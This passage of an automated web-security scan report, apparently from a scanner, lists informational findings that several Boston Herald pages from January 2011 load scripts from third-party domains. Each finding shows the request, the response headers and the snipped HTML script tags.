Host:	http://www.bostonherald.com
Path:	/business/general/view/20110128wal-mart_seeks_opening_chains_moves_toward_hub_draw_ire_from_jobs_group/format=comments&srvc=home&position=6

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:10:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 99426

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.606. http://www.bostonherald.com/business/general/view/20110128wal-mart_seeks_opening_chains_moves_toward_hub_draw_ire_from_jobs_group/srvc=home&position=6 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/business/general/view/20110128wal-mart_seeks_opening_chains_moves_toward_hub_draw_ire_from_jobs_group/srvc=home&position=6

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /business/general/view/20110128wal-mart_seeks_opening_chains_moves_toward_hub_draw_ire_from_jobs_group/srvc=home&position=6 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:10:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 47088

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.607. http://www.bostonherald.com/business/healthcare/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/business/healthcare/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /business/healthcare/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:25:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 51822

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.608. http://www.bostonherald.com/business/media/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/business/media/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /business/media/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:24:53 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 52986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.609. http://www.bostonherald.com/business/real_estate/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/business/real_estate/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /business/real_estate/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:19:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 61241

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.610. http://www.bostonherald.com/business/real_estate/view/20110126home_sales_drop_prices_rise_in_2010/srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/business/real_estate/view/20110126home_sales_drop_prices_rise_in_2010/srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /business/real_estate/view/20110126home_sales_drop_prices_rise_in_2010/srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:19:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 41575

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.611. http://www.bostonherald.com/business/real_estate/view/20110127foreclosure_activity_up_across_most_us_metro_areas/srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/business/real_estate/view/20110127foreclosure_activity_up_across_most_us_metro_areas/srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /business/real_estate/view/20110127foreclosure_activity_up_across_most_us_metro_areas/srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:18:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 45286

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.612. http://www.bostonherald.com/business/real_estate/view/20110128robotics_firm_relocating_to_hubs_innovation_district/srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/business/real_estate/view/20110128robotics_firm_relocating_to_hubs_innovation_district/srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /business/real_estate/view/20110128robotics_firm_relocating_to_hubs_innovation_district/srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:17:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 40254

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



